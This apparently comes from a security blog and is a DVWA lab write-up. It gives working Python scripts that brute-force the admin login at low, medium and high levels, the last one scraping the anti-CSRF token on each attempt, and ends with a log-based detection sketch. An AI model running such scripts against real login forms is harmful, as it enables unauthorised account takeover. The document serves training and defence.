DVWA - Brute Force (low, medium, high)
2017-01-05 22:08
low
Iterate over a dictionary of candidate passwords (this only succeeds if the dictionary contains the password).

```python
import requests


def main():
    url = 'http://192.168.67.22/dvwa/vulnerabilities/brute/index.php'
    headers = {
        'Cookie': 'PHPSESSID=h6r8555q2obvo388r4u50lg397; security=low'
    }
    # pwd.txt holds one candidate password per line
    with open('pwd.txt') as h:
        for line in h:
            password = line.strip()
            new_url = url + '?username=admin&password=' + password + '&Login=Login'
            res = requests.get(new_url, headers=headers)
            # res.text is the decoded body (res.content is bytes on Python 3)
            if 'Username and/or password incorrect.' in res.text:
                print('Test %s: No' % password)
            else:
                print('Test %s: Yes' % password)
                break


if __name__ == '__main__':
    main()
```
Result

```
Test 123456: No
Test admin: No
Test password: Yes
[Finished in 0.3s]
```
medium
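The source code contains `sleep( 2 );`.
A failed attempt is delayed by 2 s. The method is the same as for low, only slower; the security level `security` in the cookie has to be updated.

```python
headers = {
    'Cookie': 'PHPSESSID=h6r8555q2obvo388r4u50lg397; security=medium'
}
```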
high
The page source shows a hidden field, and the PHP source checks it:

```html
<input type="hidden" name="user_token" value="2fe55c6b0091776e6f46283d41854b41">
```

```php
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
```

There is one extra field. Testing shows that the value of the `user_token` field is dynamic, so the idea is to fetch the field's current value in code and then send the request that tests the password.

```python
import re

import requests


def main():
    url = 'http://192.168.67.22/dvwa/vulnerabilities/brute/index.php'
    headers = {
        'Cookie': 'PHPSESSID=h6r8555q2obvo388r4u50lg397; security=high'
    }
    # pwd.txt holds one candidate password per line
    with open('pwd.txt') as h:
        for line in h:
            password = line.strip()
            # Load the form first to read the current user_token
            res = requests.get(url, headers=headers)
            m = re.search(r"user_token' value='(.*?)'", res.text, re.M | re.S)
            if not m:
                # Without a token the next request cannot be built
                print('user_token not found in response')
                break
            user_token = m.group(1)
            new_url = url + '?username=admin&password=' + password + '&user_token=' + user_token + '&Login=Login'
            res = requests.get(new_url, headers=headers)
            if 'Username and/or password incorrect.' in res.text:
                print('Test %s: No' % password)
            else:
                print('Test %s: Yes' % password)
                break


if __name__ == '__main__':
    main()
```
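Neither the 2 s delay at medium nor the token at high limits the number of guesses, and because the form submits by GET every attempt lands in the web server's access log. The following detection sketch is an added example, not code from the original post: the log lines, the client addresses 192.168.67.50/60, the threshold and the window are all constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Constructed Apache access-log lines (not captured from a real server).
SAMPLE_LOG = """\
192.168.67.50 - - [05/Jan/2017:22:01:00 +0800] "GET /dvwa/vulnerabilities/brute/index.php HTTP/1.1" 200 4300
192.168.67.50 - - [05/Jan/2017:22:01:01 +0800] "GET /dvwa/vulnerabilities/brute/index.php?username=admin&password=123456&user_token=aaa&Login=Login HTTP/1.1" 200 4350
192.168.67.50 - - [05/Jan/2017:22:01:03 +0800] "GET /dvwa/vulnerabilities/brute/index.php HTTP/1.1" 200 4300
192.168.67.50 - - [05/Jan/2017:22:01:04 +0800] "GET /dvwa/vulnerabilities/brute/index.php?username=admin&password=admin&user_token=bbb&Login=Login HTTP/1.1" 200 4350
192.168.67.50 - - [05/Jan/2017:22:01:06 +0800] "GET /dvwa/vulnerabilities/brute/index.php HTTP/1.1" 200 4300
192.168.67.50 - - [05/Jan/2017:22:01:07 +0800] "GET /dvwa/vulnerabilities/brute/index.php?username=admin&password=password&user_token=ccc&Login=Login HTTP/1.1" 200 4400
192.168.67.60 - - [05/Jan/2017:22:02:00 +0800] "GET /dvwa/vulnerabilities/brute/index.php HTTP/1.1" 200 4300
192.168.67.60 - - [05/Jan/2017:22:02:10 +0800] "GET /dvwa/vulnerabilities/brute/index.php?username=admin&password=hunter2&user_token=ddd&Login=Login HTTP/1.1" 200 4350
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "GET (\S+) HTTP/[\d.]+" (\d{3})')


def detect_bruteforce(log_text, threshold=3, window=timedelta(seconds=60)):
    """Return the (client_ip, username) pairs with >= threshold login attempts inside window."""
    attempts = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, ts, target, _status = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith('/vulnerabilities/brute/index.php'):
            continue
        query = parse_qs(parts.query)
        if 'username' not in query or 'password' not in query:
            continue  # plain page load (e.g. a token fetch), not a login attempt
        when = datetime.strptime(ts, '%d/%b/%Y:%H:%M:%S %z')
        attempts[(ip, query['username'][0])].append(when)
    flagged = set()
    for key, times in attempts.items():
        times.sort()
        # Sliding window: any run of `threshold` attempts that fits inside `window`
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window:
                flagged.add(key)
                break
    return flagged


if __name__ == '__main__':
    print(detect_bruteforce(SAMPLE_LOG))
```

Counting per account rather than per request is what makes the delay and the token irrelevant to the detector: the attempts are spaced out and carry fresh tokens, yet still cluster on one username.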